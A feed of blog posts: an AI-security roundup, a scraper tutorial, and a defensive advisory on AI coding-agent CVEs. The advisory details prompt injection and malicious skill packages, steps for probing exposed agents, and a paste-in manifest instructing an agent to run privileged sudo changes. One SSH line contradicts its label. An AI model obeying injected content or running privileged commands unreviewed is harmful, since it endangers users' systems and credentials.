2026-03-31 06:35:45
This was the week AI security stopped being theoretical.
Three events, all within days of each other, paint a picture that every developer building with AI tools needs to understand.
BeyondTrust's Phantom Labs team (Tyler Jespersen) found a critical vulnerability in OpenAI Codex affecting all Codex users.
The attack: command injection through GitHub branch names in task creation requests. An attacker could craft a malicious branch name that, when processed by Codex, would exfiltrate a victim's GitHub tokens to an attacker-controlled server.
The impact: full read/write access to a victim's entire codebase. Lateral movement across repositories. Everything.
OpenAI patched it quickly. But the pattern is what matters: AI coding tools inherit trust from user context (GitHub tokens, env vars, API keys) but don't treat that context as a security boundary.
Every AI coding tool that touches git has this same attack surface. Basically nobody is auditing for it.
On March 24, 2026, litellm version 1.82.8 was published to PyPI with a malicious .pth file that executed automatically on every Python process startup.
The payload: a multi-stage credential stealer targeting AI pipelines and cloud secrets. The same threat actor (TeamPCP) had already compromised Trivy, KICS, and Telnyx across five supply chain ecosystems.
The timeline:
This is the package that most AI proxy servers use. If you're routing API calls through litellm (and many vibe-coded apps do), you were exposed.
Endor Labs just published their analysis showing this is the same attacker behind the Trivy and KICS compromises. This is a coordinated campaign targeting AI infrastructure specifically.
Anthropic released Computer Use for Claude Code. Claude can now open your apps, click through your UI, and test what it built, all from the CLI.
The capability is impressive. The security implications are sobering.
With Computer Use, the feedback loop is fully closed: Claude writes code, runs it, tests it visually, finds bugs, fixes them, deploys. No human in the loop checking if:
This isn't Claude's fault. The tool works as designed. But it means insecure code ships faster than ever, with more confidence, because "it tested itself."
All three events share a common thread: trust boundaries in AI development are poorly defined.
pip install litellm as a safe operationMeanwhile, 9to5Mac reports that vibe coding has broken Apple's App Store review queue. Wait times are up from less than a day to 3+ days. The volume of AI-generated app submissions has overwhelmed human reviewers.
What comes next is predictable: automated security gates. Apple, Google, and every app marketplace will add automated scanning. Apps with exposed API keys, missing authentication, and hardcoded secrets will get auto-rejected before a human ever looks at them.
If you're shipping vibe-coded apps:
Pin your dependencies. Use lockfiles. Verify hashes. Don't pip install without knowing exactly what version you're getting.
Treat AI-generated code as untrusted input. Review it the way you'd review a PR from a new hire. The code works, but "works" and "secure" are different things.
Scan before shipping. Tools like VibeCheck scan your GitHub repos and deployed URLs for the common vibe coding mistakes: exposed API keys, missing auth, open endpoints, insecure headers.
Assume your secrets are exposed. If you've ever hardcoded an API key in a vibe-coded project, rotate it now. Not tomorrow. Now.
Add rate limiting to every public endpoint. The bots are faster than your users.
The AI coding revolution is real. The security crisis is also real. They're the same thing.
I track vibe coding security tools and incidents at notelon.ai. Free scanner, no signup required.
2026-03-31 06:35:34
Was spending every Monday morning checking 23 competitor product pages. Copy URL, open tab, scroll to price, write it down. Repeat. 3 hours 47 minutes gone on average.
Decided to automate it.
Running a small e-commerce thing on the side. Needed to stay competitive on pricing. But manually checking prices across Amazon, eBay, and niche sites? Tedious as hell.
Spreadsheet had columns for:
Every. Single. Week. Manually.
Thought I'd write a quick script. Grab HTML, parse price, done.
import requests
from bs4 import BeautifulSoup
url = "https://example.com/product/123"
response = requests.get(url)
soup = BeautifulSoup(response.text, 'html.parser')
price = soup.find('span', class_='price').text
Worked for maybe 3 sites. Then:
Back to manual checking. Annoying.
Ended up fixing it in a couple of ways
Split the problem:
Amazon/eBay (big sites): Used existing scraper APIs instead of fighting detection. Thought I could beat Amazon's bot detection myself. I couldn't. ParseForge has Amazon product scrapers that handle that stuff already. Saved me from spending a week on proxy rotation.
Small sites: Basic requests + BeautifulSoup worked fine. These sites don't have serious bot detection.
Storage: Just appended to CSV. Thought about Postgres or something fancier. Then I realized weekly price checks = maybe 1,200 rows per year. CSV opens in Excel. Done.
Script looks something like:
import csv
import requests
from datetime import datetime
# Small site scraping
def get_basic_price(url, selector):
try:
response = requests.get(url, headers={'User-Agent': 'Mozilla/5.0'})
soup = BeautifulSoup(response.text, 'html.parser')
price_text = soup.select_one(selector).text
# Clean: "$19.99" -> 19.99
return float(price_text.replace('$', '').replace(',', '').strip())
except:
return None
# Amazon/big sites: use API
def get_amazon_price(product_id):
# Call scraper API here
# Returns structured data (price, title, rating, etc.)
pass
# Weekly run
products = [
{'name': 'Widget A', 'url': 'https://smallsite.com/widget-a', 'selector': '.price'},
{'name': 'Widget B', 'asin': 'B08XYZ123', 'platform': 'amazon'},
]
results = []
for product in products:
if 'asin' in product:
price = get_amazon_price(product['asin'])
else:
price = get_basic_price(product['url'], product['selector'])
results.append({
'product': product['name'],
'price': price,
'date': datetime.now().strftime('%Y-%m-%d'),
})
# Save to CSV
with open('competitor_prices.csv', 'a', newline='') as f:
writer = csv.DictWriter(f, fieldnames=['product', 'price', 'date'])
writer.writerows(results)
Now runs every Monday via cron. Takes 47 seconds instead of 4+ hours.
Couple things that made it actually work
Don't fight big sites
Error handling matters more than I thought
CSV is good enough
Honestly would add:
But current version does the job. 4 hours back per week.
Basic approach:
ParseForge has scrapers for Amazon, eBay, Walmart if you're tracking those. Handles the annoying stuff tho you still gotta clean the data yourself.
Went from manual Monday drudgery to automated. Worth the weekend it took to build.
2026-03-31 06:30:41
Two critical vulnerabilities — CVE-2026-22812 (CVSS 8.8) and CVE-2026-22813 (CVSS 9.6) — affect the most widely deployed open-source AI coding agent platforms. 220,000+ instances are exposed on the public internet with no authentication. 15,200 are confirmed vulnerable to unauthenticated remote code execution. But the exposure isn't limited to cloud servers — the same agent running on your Mac Mini under your desk has the same root-level access to your files, your credentials, and your network. This article provides the technical analysis, the exposure data, remediation for both VPS and local hardware deployments, and a 5-layer defense architecture that works regardless of where your agent runs.
Apple cannot keep the Mac Mini in stock. The M4 and M4 Pro configurations are backordered across most retailers, and the reason is not what Apple planned for. Developers are buying them to run AI coding agents locally — specifically OpenClaw, which needs Apple Silicon's unified memory architecture for local LLM inference.
The logic makes sense on paper. A $600 Mac Mini with 16GB of unified memory runs a 7B parameter model fast enough for real-time coding assistance. A $1,400 M4 Pro with 48GB runs 34B models comfortably. No cloud costs. No API rate limits. No data leaving your network. Private, fast, and owned.
There is one problem. The agent running on that Mac Mini has the same privileges as the user who launched it. On most developer machines, that means:
~/ — every project, every .env file, every SSH keyA Meta security researcher had to physically unplug her Mac Mini to stop an AI coding agent from deleting her email inbox. The agent was running with full system permissions and connected to a compromised skill package. It began executing destructive commands that could not be stopped through the UI because the WebSocket connection was being used by the attacker's injected scripts.
That incident happened on a local machine with no internet exposure. The attack vector was not a network exploit — it was a malicious package in the agent's skill chain.
For the 220,000+ instances running on VPS infrastructure with no authentication and no firewall, the same attack can be executed remotely by anyone on the internet.
The industry spent two months talking about the 220,000 number. What it missed is that the number only counts servers. It does not count the desks.
CVE ID: CVE-2026-22812
CVSS Score: 8.8 (High)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Affected Software: OpenCode HTTP server (serve mode), OpenClaw instances
Discovery: Reported via NVD/NIST, confirmed by SecurityScorecard STRIKE team
When an AI coding agent runs in serve mode — exposing an HTTP and WebSocket interface for browser-based interaction — the server binds to 0.0.0.0 by default. In versions prior to 1.1.10, this server has no authentication mechanism whatsoever. Even in 1.1.10+, where the server is disabled by default, enabling it provides only optional Basic Auth that most deployments skip.
Any process on the network — or anyone on the internet if the server is publicly reachable — can:
The agent is not a code assistant. It is a full remote shell with an AI interface.
On a VPS: If port 4096 is open, the entire internet has root access.
On a Mac Mini: If the agent binds to 0.0.0.0 instead of 127.0.0.1, every device on the local network has root access. On a coffee shop WiFi, a coworking space, a hotel — that is everyone in the room.
| Component | Value | Meaning |
|---|---|---|
| Attack Vector | Network | Exploitable remotely |
| Attack Complexity | Low | No special conditions required |
| Privileges Required | None | No authentication needed |
| User Interaction | None | No victim action required |
| Scope | Unchanged | Stays within the vulnerable component |
| Confidentiality | High | Full read access |
| Integrity | High | Full write access |
| Availability | High | Full denial of service possible |
This is a trivially exploitable vulnerability. If the port is reachable, the system is compromised.
CVE ID: CVE-2026-22813
CVSS Score: 9.6 (Critical)
Affected Software: OpenClaw web UI
The web interface that renders AI agent output does not sanitize the markdown and HTML returned by the language model. An attacker who can influence the LLM's output — through prompt injection, malicious context documents, or compromised training data — can inject arbitrary JavaScript that executes in the user's browser session.
Because the browser session has an active WebSocket connection to the agent backend, this JavaScript can send commands to the agent as if the user typed them, exfiltrate the contents of the current session, execute shell commands through the agent's execution interface, and persist across sessions if the injected script writes to the agent's context files.
This is the vulnerability that matters most for Mac Mini owners. CVE-2026-22812 requires network access to the agent's port. CVE-2026-22813 does not. It requires only that the agent processes a file, package, or repository that contains adversarial content. Given that AI coding agents routinely clone repositories, install npm/pip/cargo packages, read documentation files, and process code review comments — the attack surface is every piece of content the agent interacts with.
The Mac Mini on your desk. Running a local model. No cloud connection. Still vulnerable to CVE-2026-22813 through a poisoned package.json or a malicious code review comment.
Between January and March 2026, multiple independent security research groups conducted internet-wide scans targeting AI coding agent infrastructure:
| Finding | Count | Source |
|---|---|---|
| OpenClaw instances exposed on public internet | 220,000+ | Censys, Bitsight, Penligent |
| Instances confirmed vulnerable to RCE (CVE-2026-22812) | 15,200 | Penligent |
| Instances correlated with prior breach activity | 53,300 | SecurityScorecard STRIKE team |
| Malicious packages in ClawHub skill marketplace | 1,184 | CyberDesserts |
| Leaked API tokens (Supabase breach) | 1,500,000 | Infosecurity Magazine |
| Leaked email addresses (same breach) | 35,000 | Infosecurity Magazine |
These numbers are the ones that made the news. They count VPS deployments — Hetzner, DigitalOcean, Linode, Contabo — where a developer provisioned a server, installed the agent, started serve mode, and did not configure a firewall.
What they do not count: Mac Minis on home networks. Development laptops in coworking spaces. Workstations in offices with flat network topologies. These machines are not indexed by Censys. They are not visible to Shodan. But if the agent's HTTP server binds to anything other than 127.0.0.1, every device on the same network segment has the same unauthenticated access that the internet has to those 220,000 VPS instances.
The 220,000 number is a floor. The actual exposure includes every unsandboxed AI coding agent running on every machine where the developer has not explicitly configured network isolation. The Mac Mini shortage suggests that number is growing, not shrinking.
The 1,184 malicious packages discovered in the ClawHub skill marketplace represent a systemic supply chain compromise. These packages masqueraded as legitimate MCP skills but contained credential harvesters, reverse shells, cryptominers, and data exfiltration routines.
This is the attack path that bypasses all network-level defenses. A tunnel does not help if the agent itself installs a malicious package that reads ~/.ssh/id_rsa and uploads it to an attacker's server. A firewall does not help if the package phones home through an outbound HTTPS connection that looks identical to a legitimate API call.
Defense requires both network isolation (Layers 1–3) and permission scoping (Layer 5). Neither alone is sufficient.
The root cause is not a coding error. It is an architectural assumption.
AI coding agents were designed as local development tools. They assume a trusted network — your laptop, your home WiFi. The HTTP server is a convenience feature: start the agent, open a browser tab, start coding.
That assumption fails in two directions simultaneously:
Direction 1: Servers. Developers run agents on VPS infrastructure because they need persistent execution, shared team access, and GPU availability. The agent's HTTP server, designed for localhost, is now reachable from the public internet. This produced the 220,000 exposed instances.
Direction 2: Local hardware at scale. The Mac Mini shortage proves that developers are deploying AI agents on physical hardware in volumes that matter. These machines sit on home networks, office networks, and coffee shop WiFi. They are not behind firewalls. They are not running in sandboxes. The agent has the same access to the filesystem, the network, and the macOS Keychain that the developer does. The difference from the VPS scenario is visibility — no one is scanning home networks, so the exposure goes unreported.
Both directions share the same gap: the tooling provided zero infrastructure guidance. No documentation for firewall configuration. No reverse proxy templates. No authentication integration. No sandboxing guide for macOS. No permission scoping.
Developers were told "start the server and open a browser." They did.
The following describes the verification methodology used by researchers. This information is provided for defensive purposes — to help teams verify whether their own instances are vulnerable.
Step 1: Use Censys, Shodan, or any internet-facing port scanner to identify hosts running the agent's HTTP server. The default port is 4096. The server responds with a distinctive HTTP response that includes WebSocket upgrade headers and the agent's UI HTML.
GET / HTTP/1.1
Host: <target-ip>:4096
A vulnerable instance returns a 200 response with the full agent interface. There is no login page. There is no authentication challenge.
Step 2: Connect to the WebSocket endpoint. The agent accepts commands in its standard message format. Any command that the agent can execute — file operations, shell commands, package installations — is available to the attacker.
Step 3: Send a benign verification command (e.g., whoami, hostname, uname -a). If the agent returns system information, the instance is confirmed vulnerable.
Important: Do not execute destructive commands. Do not access, copy, or modify any data. Verification should confirm the vulnerability exists and stop. Report findings to the instance owner if identifiable.
Step 1: On the machine running the agent, check what address the server is bound to:
# macOS
lsof -i :4096
# Linux
ss -tlnp | grep 4096
If the output shows *:4096 or 0.0.0.0:4096, the agent is listening on all network interfaces — not just localhost. Any device on the same network can connect.
Step 2: From another device on the same network (phone, laptop, tablet), open a browser and navigate to http://<mac-mini-ip>:4096. If the agent's interface loads, the machine is exposed to the local network.
Step 3: Check what the agent process has access to:
# What user is running the agent?
whoami
# What files are readable?
ls ~/
# Is the macOS Keychain accessible?
security list-keychains
# Are SSH keys present?
ls ~/.ssh/
# Are environment variables set with API keys?
env | grep -i key
In the majority of local installations, the agent runs as the primary user account — which means full access to the home directory, all development projects, all SSH keys, and all environment variables containing API credentials.
The following architecture addresses both CVEs at the infrastructure level. The first three layers apply to VPS deployments. All five layers apply to any deployment, including local hardware.
For VPS deployments:
Use an outbound-only encrypted tunnel instead of opening inbound ports. Cloudflare Tunnel (cloudflared) establishes a connection from your server to Cloudflare's network using outbound-only QUIC connections on port 7844. No inbound ports are opened. The server's IP address is never exposed. All traffic routes through Cloudflare's 330+ city anycast network.
# Install cloudflared
curl -fsSL https://pkg.cloudflare.com/cloudflare-main.gpg \
| gpg --dearmor -o /usr/share/keyrings/cloudflare.gpg
echo "deb [signed-by=/usr/share/keyrings/cloudflare.gpg] \
https://pkg.cloudflare.com/cloudflared $(lsb_release -cs) main" \
| tee /etc/apt/sources.list.d/cloudflared.list
apt update && apt install cloudflared
# Create tunnel (requires Cloudflare API token)
cloudflared tunnel create my-agent-tunnel
# Configure: route agent.yourdomain.com → localhost:4096
# Catch-all: return 404 for all other hostnames
Configuration note: Set the tunnel's catch-all to http_status:404. This ensures that any request arriving at Cloudflare that does not match your specific hostname is rejected before it reaches your server.
For Mac Mini / local hardware:
Force the agent to bind to 127.0.0.1 only — never 0.0.0.0. This restricts the HTTP server to connections originating from the same machine.
# If the agent supports a bind address flag:
opencode serve --host 127.0.0.1
# Verify it's not listening on all interfaces:
lsof -i :4096
# Should show: 127.0.0.1:4096, NOT *:4096
If you need to access the agent from another device (e.g., your laptop connecting to a Mac Mini on your desk), use SSH port forwarding instead of exposing the port:
# From your laptop, forward local port 4096 to the Mac Mini's localhost:4096
ssh -L 4096:127.0.0.1:4096 user@mac-mini-ip
# Then open http://localhost:4096 in your laptop's browser
# Traffic is encrypted through the SSH tunnel — never exposed on the network
For persistent remote access, Cloudflare Tunnel works on macOS as well:
# Install on macOS
brew install cloudflare/cloudflare/cloudflared
# Same tunnel configuration as Linux — agent stays on localhost,
# Cloudflare handles authenticated remote access
What this prevents: On VPS — direct IP scanning, port-based attacks, DDoS. On local hardware — exposure to every device on the same WiFi or LAN. The agent becomes reachable only through authenticated channels.
Cloudflare Zero Trust Access enforces authentication at the edge. Before a request is proxied to your tunnel (and therefore your server or Mac Mini), the user must authenticate through an identity provider — Google, GitHub, one-time pin via email, or any SAML/OIDC provider.
Access Policy:
Action: Allow
Include: Emails ending in @yourdomain.com
Session duration: 24 hours
Cookie: SameSite=None, HttpOnly, Binding=Enabled
Critical configuration for WebSocket agents: The SameSite=None and Binding Cookie settings are required for AI coding agents that use WebSocket connections. Without them, the browser's WebSocket upgrade request will fail the cookie check and the session will drop mid-conversation. This is a common misconfiguration that causes intermittent disconnections.
What this prevents: Unauthorized access from anyone who does not possess valid identity credentials. Even if an attacker discovers the agent's URL, they see a Cloudflare login page — not the agent interface.
Enable authentication on the agent's HTTP server itself as a secondary gate.
# Generate a high-entropy password
AGENT_PASSWORD=$(openssl rand -base64 24)
# Set as environment variable for the agent process
# Linux (systemd):
echo "OPENCODE_SERVER_PASSWORD=$AGENT_PASSWORD" >> /etc/systemd/system/opencode.service.d/override.conf
systemctl daemon-reload && systemctl restart opencode
# macOS (launchd or manual):
export OPENCODE_SERVER_PASSWORD=$AGENT_PASSWORD
opencode serve
Important caveat: When Zero Trust Access is active, enabling Basic Auth on the agent server can create an authentication loop (Access redirects on 401, server returns 401 before Access processes). The correct implementation is conditional: set the server password only when Zero Trust is not configured. When Zero Trust is active, it is the authentication layer.
For VPS (Ubuntu/Debian):
# Firewall: deny all inbound, allow SSH only
ufw default deny incoming
ufw default allow outgoing
ufw allow ssh
ufw --force enable
# Port 4096 is NOT opened — all agent traffic goes through the tunnel
# Brute force protection
apt install -y fail2ban
systemctl enable fail2ban
# Kernel hardening
cat >> /etc/sysctl.d/99-hardening.conf << 'EOF'
net.ipv4.tcp_syncookies = 1
net.ipv4.conf.all.rp_filter = 1
net.ipv4.icmp_echo_ignore_broadcasts = 1
net.ipv4.conf.all.accept_redirects = 0
kernel.randomize_va_space = 2
net.ipv4.conf.all.log_martians = 1
EOF
sysctl --system
# Automatic security updates
apt install -y unattended-upgrades
dpkg-reconfigure -plow unattended-upgrades
| Control | What it does |
|---|---|
| UFW (default deny) | Blocks all inbound traffic except SSH |
| fail2ban | Bans IPs after repeated failed SSH attempts |
| SYN cookies | Prevents SYN flood denial of service |
| Reverse path filtering | Prevents IP spoofing |
| ICMP broadcast ignore | Prevents Smurf amplification attacks |
| Redirect rejection | Prevents ICMP redirect hijacking |
| ASLR (full) | Randomizes memory addresses to defeat buffer overflow exploits |
| Martian logging | Logs packets with impossible source addresses |
| Unattended upgrades | Automatically applies security patches |
For Mac Mini / macOS:
macOS does not need the same kernel hardening (it ships with ASLR, SIP, and Gatekeeper enabled). The priorities are different:
# Enable the macOS firewall
sudo /usr/libexec/ApplicationFirewall/socketfilterfw --setglobalstate on
# Block all incoming connections (allow only essential services)
sudo /usr/libexec/ApplicationFirewall/socketfilterfw --setblockall on
# Enable stealth mode (don't respond to pings or port scans)
sudo /usr/libexec/ApplicationFirewall/socketfilterfw --setstealthmode on
# Verify settings
sudo /usr/libexec/ApplicationFirewall/socketfilterfw --getglobalstate
Additional macOS-specific hardening:
# Disable Remote Login (SSH) if you don't need it
sudo systemsetup -setremotelogin off
# Disable Remote Management
sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart \
-deactivate -configure -access -off
# Enable FileVault (full disk encryption) — critical if the machine is physically accessible
sudo fdesetup enable
# Automatic updates
sudo softwareupdate --schedule on
| Control | What it does |
|---|---|
| macOS Firewall (block all) | Blocks all incoming connections |
| Stealth mode | Makes the machine invisible to network scans |
| FileVault | Encrypts the entire disk — protects if the machine is stolen |
| Remote Login off | Disables SSH access if not needed |
| Automatic updates | Applies security patches as they ship |
Post-deployment: Disable SSH password authentication on both VPS and macOS. Use key-only access:
# Linux
sed -i 's/^PermitRootLogin yes/PermitRootLogin prohibit-password/' /etc/ssh/sshd_config
systemctl restart sshd
# macOS (if SSH is enabled)
sudo sed -i '' 's/^#PasswordAuthentication yes/PasswordAuthentication no/' /etc/ssh/sshd_config
sudo launchctl stop com.openssh.sshd && sudo launchctl start com.openssh.sshd
This layer is the one that defends against CVE-2026-22813 and supply chain attacks — the threats that bypass all network-level protection. It applies equally to VPS deployments and Mac Mini setups.
MCP servers — now governed by the Linux Foundation with backing from Anthropic, OpenAI, Google, Microsoft, AWS, and Cloudflare — provide a standardized interface between AI agents and external tools. The critical security feature of MCP is that each server connection can be independently scoped:
write: false — they can analyze code, run audits, and report findings, but cannot modify filesbash: false — they cannot execute arbitrary commands regardless of what the LLM requests
# Example: read-only security auditor
agent:
name: security-reviewer
tools:
write: false
edit: false
bash: false
mcp:
- cloudflare-docs # Can read documentation
- github # Can read repositories
# Cannot: deploy, modify, execute
This is not behavioral guardrailing. The agent cannot prompt its way past these restrictions. The MCP server simply does not expose write operations to agents configured as read-only. The permission boundary is enforced at the infrastructure layer, not the prompt layer.
For Mac Mini owners specifically: This layer is your primary defense against supply chain attacks. A malicious package installed by the agent can execute code with the agent's permissions. If the agent has unrestricted filesystem and shell access, the package has unrestricted filesystem and shell access. Scoped MCP permissions mean that even if the agent is tricked into installing a malicious package, the damage is bounded by the agent's configured permission set — not by the user's full system access.
ss -tlnp | grep 4096 — if the port is listening, check if it's reachable from outside. Search Censys or Shodan for your server's IP.ufw deny 4096 — the single fastest remediation.lsof -i :4096 — if it shows *:4096, your agent is exposed to your entire network.--host 127.0.0.1.~/.ssh/authorized_keys. Check for unexpected cron jobs (VPS) or Launch Agents (macOS). Review outbound network connections for unfamiliar destinations..env files instead of global exports.You just read 4,000 words of vulnerability analysis and remediation steps. Your AI coding agent — the one this article is about — can execute every one of them.
Copy the block below. Paste it into your agent's chat. Say: "Do this."
The agent will read the manifest, execute each step in order, stop when a condition isn't met, and ask you for credentials only when it needs them. It will not guess. It will not skip.
This is how security advisories should work in 2026. Not "read this and figure it out" — but "read this and execute."
## Agent-Executable Remediation Manifest
## CVE-2026-22812 (CVSS 8.8) + CVE-2026-22813 (CVSS 9.6)
## Source: Hodge Luke Digital Intelligence Agency
## Target: Any VPS or macOS machine running an AI coding agent
### INSTRUCTIONS FOR AGENT
Execute each step sequentially. Do not skip steps.
STOP_IF conditions halt execution — explain why to the user and await instructions.
ASK_USER directives require user input before proceeding — do not guess values.
All commands must be run with appropriate privileges (sudo where indicated).
Report the result of each step before moving to the next.
---
### Step 0: Detect platform
Run: uname -s
IF output contains "Darwin" → SET PLATFORM=macos
IF output contains "Linux" → SET PLATFORM=linux
REPORT: "Detected platform: [PLATFORM]"
---
### Step 1: Check if an agent HTTP server is running
IF PLATFORM=linux:
Run: ss -tlnp | grep -E ':(4096|3000|8080|8888) '
IF PLATFORM=macos:
Run: lsof -i -P | grep -E ':(4096|3000|8080|8888) .*(LISTEN)'
STOP_IF: No output (no agent server detected — this machine may not be affected)
REPORT: "Found agent server listening on: [port and address]"
IF output shows 0.0.0.0 or *: → REPORT: "WARNING: Agent is bound to all
interfaces — exposed to the network. Proceeding with remediation."
IF output shows 127.0.0.1 only → REPORT: "Agent is bound to localhost only.
Network exposure is limited. Continuing with hardening steps."
---
### Step 2: Block the port immediately
IF PLATFORM=linux:
Run: sudo ufw status
IF ufw is inactive:
Run: sudo ufw default deny incoming
Run: sudo ufw default allow outgoing
Run: sudo ufw allow ssh
Run: sudo ufw --force enable
Run: sudo ufw deny [detected port from Step 1]
Run: sudo ufw reload
REPORT: "Firewall enabled. Port [port] blocked."
IF PLATFORM=macos:
Run: sudo /usr/libexec/ApplicationFirewall/socketfilterfw --getglobalstate
IF firewall is disabled:
Run: sudo /usr/libexec/ApplicationFirewall/socketfilterfw --setglobalstate on
Run: sudo /usr/libexec/ApplicationFirewall/socketfilterfw --setblockall on
Run: sudo /usr/libexec/ApplicationFirewall/socketfilterfw --setstealthmode on
REPORT: "macOS firewall enabled. All incoming blocked. Stealth mode on."
---
### Step 3: Force localhost binding
IF PLATFORM=linux:
Check if agent is managed by systemd:
Run: systemctl list-units --type=service | grep -i -E 'opencode|claw'
IF found:
REPORT: "Agent is running as systemd service: [service name]"
ASK_USER: "Should I modify the service to bind to 127.0.0.1 only? (yes/no)"
IF yes:
Run: sudo mkdir -p /etc/systemd/system/[service].d
Write override.conf with Environment="HOST=127.0.0.1"
Run: sudo systemctl daemon-reload
Run: sudo systemctl restart [service]
IF PLATFORM=macos:
REPORT: "On macOS, restart your agent with: --host 127.0.0.1"
REPORT: "Example: opencode serve --host 127.0.0.1"
ASK_USER: "What is the command you use to start your agent? I will provide
the modified command with localhost binding."
---
### Step 4: Install Cloudflare Tunnel (optional but recommended)
ASK_USER: "Do you want to set up a Cloudflare Tunnel for secure remote
access? This requires a Cloudflare account. (yes/no)"
STOP_IF: User says no (skip to Step 5)
ASK_USER: "Please provide your Cloudflare API token with Zone:DNS:Edit and
Account:Cloudflare Tunnel:Edit permissions."
ASK_USER: "What domain do you want to use for accessing the agent?
(e.g., agent.yourdomain.com)"
IF PLATFORM=linux:
Run: curl -fsSL https://pkg.cloudflare.com/cloudflare-main.gpg \
| sudo gpg --dearmor -o /usr/share/keyrings/cloudflare.gpg
Run: echo "deb [signed-by=/usr/share/keyrings/cloudflare.gpg] \
https://pkg.cloudflare.com/cloudflared $(lsb_release -cs) main" \
| sudo tee /etc/apt/sources.list.d/cloudflared.list
Run: sudo apt update && sudo apt install -y cloudflared
IF PLATFORM=macos:
Run: brew install cloudflare/cloudflare/cloudflared
Run: cloudflared tunnel login
Run: cloudflared tunnel create agent-tunnel
Write config.yml:
tunnel: [tunnel-id]
credentials-file: /root/.cloudflared/[tunnel-id].json
ingress:
- hostname: [user-provided domain]
service: http://localhost:[detected port]
- service: http_status:404
Run: cloudflared tunnel route dns agent-tunnel [user-provided domain]
Run: cloudflared tunnel run agent-tunnel
REPORT: "Tunnel created. Agent accessible at https://[domain].
No inbound ports required."
---
### Step 5: Harden the host
IF PLATFORM=linux:
Run: sudo apt install -y fail2ban
Run: sudo systemctl enable fail2ban
Write /etc/sysctl.d/99-agent-hardening.conf:
net.ipv4.tcp_syncookies = 1
net.ipv4.conf.all.rp_filter = 1
net.ipv4.icmp_echo_ignore_broadcasts = 1
net.ipv4.conf.all.accept_redirects = 0
kernel.randomize_va_space = 2
net.ipv4.conf.all.log_martians = 1
Run: sudo sysctl --system
Run: sudo apt install -y unattended-upgrades
Run: sudo dpkg-reconfigure -plow unattended-upgrades
REPORT: "Host hardened: fail2ban active, kernel parameters set,
automatic security updates enabled."
IF PLATFORM=macos:
Run: sudo fdesetup status
IF FileVault is off:
REPORT: "FileVault (disk encryption) is disabled."
ASK_USER: "Enable FileVault? This encrypts your entire disk.
Requires restart. (yes/no)"
IF yes: Run: sudo fdesetup enable
Run: sudo softwareupdate --schedule on
REPORT: "macOS hardened: firewall active, stealth mode on,
automatic updates enabled."
---
### Step 6: Disable SSH password authentication
IF PLATFORM=linux:
Run: grep -E '^PasswordAuthentication' /etc/ssh/sshd_config
IF set to yes:
Run: sudo sed -i 's/^PasswordAuthentication yes/PasswordAuthentication no/' \
/etc/ssh/sshd_config
Run: sudo systemctl restart sshd
REPORT: "SSH password authentication disabled. Key-only access."
IF PLATFORM=macos:
Run: sudo systemsetup -getremotelogin
IF Remote Login is on:
ASK_USER: "SSH is enabled. Do you need remote SSH access to this
machine? (yes/no)"
IF no:
Run: sudo systemsetup -setremotelogin off
REPORT: "SSH disabled entirely."
IF yes:
Run: sudo sed -i '' 's/^#PasswordAuthentication yes/PasswordAuthentication no/' \
/etc/ssh/sshd_config
Run: sudo launchctl stop com.openssh.sshd
Run: sudo launchctl start com.openssh.sshd
REPORT: "SSH password authentication disabled. Key-only access."
---
### Step 7: Verify remediation
IF PLATFORM=linux:
Run: ss -tlnp | grep -E ':(4096|3000|8080|8888) '
Run: sudo ufw status verbose
Run: systemctl is-active fail2ban
IF PLATFORM=macos:
Run: lsof -i -P | grep -E ':(4096|3000|8080|8888) .*(LISTEN)'
Run: sudo /usr/libexec/ApplicationFirewall/socketfilterfw --getglobalstate
Run: sudo fdesetup status
REPORT: "Remediation complete. Summary:"
REPORT: "- Agent bind address: [current binding]"
REPORT: "- Firewall: [status]"
REPORT: "- SSH hardening: [status]"
REPORT: "- Host hardening: [status]"
REPORT: "- Tunnel: [configured/not configured]"
REPORT: "- Disk encryption: [status, macOS only]"
---
### What this manifest does NOT cover (requires manual review)
- Layer 2 (Zero Trust Access): Requires Cloudflare dashboard configuration
for identity provider integration. See the full article for policy setup.
- Layer 5 (MCP permission scoping): Requires agent-specific configuration
based on your tool chain. See the full article for examples.
- Supply chain audit: Review installed packages manually.
Run: pip list / npm list -g / cargo install --list
- Credential rotation: If your agent was exposed, assume all environment
variables, SSH keys, and API tokens accessible to the agent process are
compromised. Rotate them.
This is the first security advisory we've published with an agent-executable remediation manifest. We believe every security disclosure that tells developers what to do should let their tools do it for them. We'll be publishing these with every advisory going forward.
We built FORGE because we were setting up AI coding agent infrastructure for clients and kept solving the same security problems from scratch — every time. Cloudflare Tunnel configuration. Zero Trust access policies. WebSocket cookie conflicts. Kernel hardening. MCP server scoping. The same 1,000 lines of battle-tested bash with rollback on failure.
FORGE implements all five layers described in this article as a single deployment script. One command. Under 10 minutes. The agent runs on your VPS, behind your tunnel, gated by your identity, hardened to CIS baselines, with MCP servers pre-configured and scoped.
It is not a hosted service. You own the server. You own the code. You own the infrastructure. The $47 Developer Edition buys the architecture, security model, and deployment automation. Your VPS costs about $7/month. There is no recurring fee to us.
We built it because the gap between "start the server" and "run the server securely" should not require 1,000 lines of infrastructure automation that every developer has to figure out from scratch. FORGE closes that gap.
Hodge Luke is the founder of Hodge Luke Digital Intelligence Agency and the creator of FORGE — a security-hardened deployment platform for AI coding agents built on Cloudflare's edge network. FORGE implements the 5-layer defense-in-depth model described in this article as a one-command deployment.
Hodge Luke | Two Guys and some Bots | forge.useacceda.com
2026-03-31 06:28:14
Solo dev, no funding, one app that needed to work offline and think online. Why the architecture ended up the way it did.
I spent the last several months building an AI-powered wardrobe app called Outfii. No cofounders, no funding, no team. Just me, too much chai, and a mass of decisions I wasn't qualified to make.
You photograph your clothes, the app organizes them, and AI helps you figure out what to wear. It's on Google Play now. Here's how it actually went.
Every morning, same thing. Full closet, nothing to wear. I looked it up and apparently most people regularly use about 20% of what they own. The rest just hangs there.
I don't have a fashion background. But "help me combine clothes I already own" felt like something code could handle. Whether I was the right person to build it is still an open question.
This is the part that shaped every other decision.
Some things need to happen instantly. When you're flipping through outfit options, you can't be waiting on a server to tell you whether navy and olive work together. That feedback loop needs to be under 50ms or it feels broken.
Other things need actual intelligence. Looking at a photo and figuring out "that's a linen shirt, it's dusty rose, semi-formal" requires a vision model. Suggesting what to wear tomorrow based on your wardrobe, the weather, and what you wore this week requires an LLM.
So the app has two brains. One lives on your phone. One lives in the cloud. They do completely different jobs.
